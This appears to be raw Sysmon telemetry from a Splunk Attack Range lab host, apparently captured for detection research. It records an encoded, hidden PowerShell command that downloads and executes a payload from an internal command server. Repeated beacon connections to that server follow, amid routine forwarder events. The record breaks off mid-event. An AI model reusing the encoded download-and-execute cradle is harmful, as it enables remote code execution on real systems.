reed_schmidtC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000036498131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.821{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC9E1F47923E51FFADEBBE3251EC87B8,SHA256=FE5ADB2A2521FAB7BD5BB64B484A2B4A88B3686FEE0198B874DB3A972DAFAF6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:48.281{B81B27B7-A1AF-6140-A056-04000000C801}4176ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.112{B81B27B7-4013-611D-1600-00000000C801}11962844C:\Windows\system32\svchost.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.112{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:48.066{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.066{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x800000000000000036498152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-14 13:20:48.040{B81B27B7-A1AF-6140-A056-04000000C801}4176\PSHost.132760992479341065.4176.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000036498151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.024{B81B27B7-A1AF-6140-A056-04000000C801}4176ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_24lqgowh.mny.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.024{B81B27B7-A1AF-6140-A056-04000000C801}4176ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_zns5sr22.tof.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000036498149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.993{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_zns5sr22.tof.ps12021-09-14 13:20:47.993 354300x800000000000000036498162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:19.593{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50616-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:49.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B59ABDBEDB92419DDFA780F278E8FC3B,SHA256=A9ABEE28573DCC8581A136BBA839E901678E9F2E98E3C2D85B933A92F96605A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:49.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=026C1B664A94066E155A9EF8CED17C4A,SHA256=8A7F0F0B62A9C4086FC068A10F72D5D6EC7AD883A0665D9213CE332E48BA9B43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:49.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7B40905233951A761244F0F2A16F225,SHA256=E39F749F38E63BE227A784AB1BEBB001E46961DE99BEAFF956157AF314F9A41A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:49.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27B4BD380E236F485FF7535D568EDBBE,SHA256=F8B4BEF327B22FAFF9D68C59412FF59BFE10FD0BFA81FD488E9D8FFC828A023C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:20.737{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50618-false10.0.1.12-8000- 354300x800000000000000036498164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:20.202{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50617-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:50.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B780ED28423D5E2B88CF5EC1D37B159,SHA256=CDB98BF5110B4DF48A81DAF605AF3F8E46E12D384FC5D3850FB8F413AE3CCEDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:51.164{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E3878AF35E6EBCDA85CFE7DF1C86EA2,SHA256=79CF3B5D3B5394908F614C939ACE251496B425A099F21902D4CD918B00A517D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:52.228{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5564E74EE1AEF37B3E15B43FEE15372,SHA256=07E5DF964CE97F54E086ADC679C100962E909AD09B2414BEB6A20ADE94B6B2F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:53.562{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CF7EB97FF471DD01046E2459A3BE54EF,SHA256=E3775103F3425EBBB1771EE1C3CD77B7EEBEB8360096FBECEDE04D091A57746F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:53.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18BBE9CF470AC836B9A98C07BEE579D4,SHA256=1235245EC496098D781E0344C2A815F6F338FF1A7FE85AF93DB35ACA9D21E927,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036498171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.218{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50619-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:54.261{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02742B339C978BEF16FAA7CBAA77A3BB,SHA256=C7DC0344E2F8291DF1B60904EA4338DF060E02558C9A854A36AC40D9E57D7D83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:55.291{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95D4D554ED6AB028AC5CF49F632CDC09,SHA256=EB328C4E068098264EE9A796DEC4A1BD1FA0398FBCE8AC6B23478387458E1195,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:56.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0DE089E82417DACF740EEB4FC8DF3CF,SHA256=51E3E0EDDF4B4BC15BC83EDE5048709B127B27065CD11F078501EBD87FFFB58B,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000036498175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:57.323{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=307D44C195BE1A7FE88C50A9AA4F2A2B,SHA256=45F2CF791023105C3129D0A4865B56AD92C1E8B01BABDB5ED03FFB31847765B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:26.713{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50620-false10.0.1.12-8000- 23542300x800000000000000036498177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:58.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CAD93F94849C6B6496CA23133AA89204,SHA256=88D349D5BDF38B6093B377FA2DA0BEE6DB6E31C2DA233B5CFAB6B78AA94B32EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:58.356{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CDD12CA0CCEB4066F145D9EAE48C50E,SHA256=44757D1D5A2371E9BE4FFCC7E10251489B888258397B81EDD2FE9EE18469A71C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:59.386{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4F0739F28B777788FEAD16917A2E080,SHA256=61A07341F5D0323A3E7A214E59D46C8FCCCF42073AFC31402DFED284949F930D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:00.401{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59D6FBA1514A6B6BE4060489430AEEBB,SHA256=9326F3AF24F3E42C52CF1C370EF8E2BA42AE5479FCC4BE14A3D392C3B29D8AB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.229{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50621-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:01.418{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B4A622A592658D43352E26DC233ABB4,SHA256=A5CB8246B9066E7F45ECDE1EAD47963AB154966AC0F73BE6479D73231247ACDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:32.726{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50622-false10.0.1.12-8000- 23542300x800000000000000036498208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.831{B81B27B7-A1BE-6140-A256-04000000C801}6224ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.786{B81B27B7-4013-611D-1600-00000000C801}11962844C:\Windows\system32\svchost.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:02.786{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.739{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:02.739{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000036498203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-14 13:21:02.702{B81B27B7-A1BE-6140-A256-04000000C801}6224\PSHost.132760992625876637.6224.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000036498202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.670{B81B27B7-A1BE-6140-A256-04000000C801}6224ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_hc4amxxp.ap4.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:02.670{B81B27B7-A1BE-6140-A256-04000000C801}6224ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_ylwlspwx.d1a.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000036498200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:02.655{B81B27B7-A1BE-6140-A256-04000000C801}6224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_ylwlspwx.d1a.ps12021-09-14 13:21:02.655 10341000x800000000000000036498199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 